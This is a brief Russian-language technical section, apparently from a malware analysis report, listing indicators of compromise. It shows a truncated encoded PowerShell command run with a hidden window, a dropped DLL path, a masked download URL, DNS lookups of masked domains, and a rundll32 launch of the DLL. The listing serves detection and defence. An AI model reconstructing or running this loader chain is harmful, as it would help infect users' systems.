Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAHMAZQB0ACAAdAAxADQAZQAgACAAKAAgACAAWwB0AFkAcABFAF0AKAAiAHsAMwB9AHsANAB9AHsAMAB9AHsAMQB9AHsAMgB9AHsANQB9ACIALQBGACAAJwBpAE8ALgAnACwAJwBEAEkAJwAsACcAUgBlAGMAJwAsACcAUw...
- %HOMEPATH%\n2qlxs7\gvqav9c\dxiq1yj.dll
- http://de###lhms.com/qpxbemmzh
- DNS ASK de###amzn.de
- DNS ASK ev##.info
- DNS ASK br###boxx.in
- DNS ASK de###lhms.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAHMAZQB0ACAAdAAxADQAZQAgACAAKAAgACAAWwB0AFkAcABFAF0AKAAiAHsAMwB9AHsANAB9AHsAMAB9AHsAMQB9AHsAMgB9AHsANQB9ACIALQBGACAAJwBpAE8ALgAnACwAJwBEAEkAJwAsACcAUgBlAGMAJwAsACcAUw...' (со скрытым окном)
- '<SYSTEM32>\rundll32.exe' %HOMEPATH%\N2qlxs7\Gvqav9c\Dxiq1yj.dll 0